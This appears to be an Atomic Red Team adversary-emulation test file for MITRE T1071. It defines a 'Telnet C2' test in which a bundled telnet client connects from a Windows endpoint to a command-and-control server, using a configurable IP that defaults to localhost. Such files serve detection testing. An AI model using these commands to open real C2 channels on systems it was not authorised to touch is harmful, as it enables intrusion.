Marco Pedrinazzi
36 lines
1.4 KiB
YAML
36 lines
1.4 KiB
YAML
attack_technique: T1071
|
|
display_name: 'Application Layer Protocol'
|
|
atomic_tests:
|
|
- name: Telnet C2
|
|
auto_generated_guid: 3b0df731-030c-4768-b492-2a3216d90e53
|
|
description: |
|
|
An adversary may establish Telnet communication from a compromised endpoint to a command and control (C2) server in order to carry out additional attacks on objectives.
|
|
supported_platforms:
|
|
- windows
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
A command and control (C2) server can be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on a specified server with a specified IP that must be reachable by a client (telnet_client.exe)
|
|
prereq_command: |
|
|
$connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}
|
|
if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
Write-Host "Setup C2 server manually"
|
|
input_arguments:
|
|
server_ip:
|
|
description: C2 server IP or URL
|
|
type: url
|
|
default: 127.0.0.1 # Replace "127.0.0.1" with the actual IP or URL
|
|
client_path:
|
|
description: Client agent path
|
|
type: path
|
|
default: PathToAtomicsFolder\T1071\bin\telnet_client.exe # Update the path if needed
|
|
server_port:
|
|
description: C2 server port
|
|
type: integer
|
|
default: 23
|
|
executor:
|
|
command: |
|
|
#{client_path} #{server_ip} --port #{server_port}
|
|
name: powershell
|